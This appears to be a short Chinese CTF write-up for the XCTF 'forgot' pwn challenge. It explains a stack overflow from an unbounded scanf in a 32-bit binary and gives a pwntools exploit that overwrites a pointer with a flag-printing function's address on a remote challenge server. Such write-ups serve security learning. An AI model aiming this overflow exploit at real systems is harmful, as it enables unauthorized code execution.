攻防世界2

樊少泽2024-10-13 22:21

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码 
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
wydaicls几秒前
什么时候触发负载均衡(kernel 6.12)
运维·负载均衡
kainx3 分钟前
Linux编译eeprom
linux·运维·c语言·eeprom
cooldream20096 分钟前
Windows11中 WSL2全方位安装与实战指南
linux·部署·wsl
文静小土豆26 分钟前
标签和选择器(Label和 Selector)
linux·前端
攻城狮在此26 分钟前
MobaXterm下载安装及SSH远程连接(交换机/路由器/服务器)
linux·运维·服务器·网络
花间相见27 分钟前
【Agent开发】—— ToolCall 、 FunctionCall 底层原理与极简实现
运维·服务器
mounter6251 小时前
【LSF/MM内核前沿】Linux 内存回收推倒重来?解析 MGLRU 与传统 LRU 的“统一之战”
linux·运维·服务器·网络·内核·内存回收
Exquisite.1 小时前
k8s的Pod管理
linux·运维·服务器
IMPYLH1 小时前
Linux 的 env 命令
linux·运维·服务器·数据库
抠脚学代码1 小时前
Linux开发--> UBoot学习
linux·学习·uboot
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!05班级宠物园部署指南06小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)07“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)08中国象棋-html版本09OpenClaw 使用和管理 MCP 完全指南10UV安装并设置国内源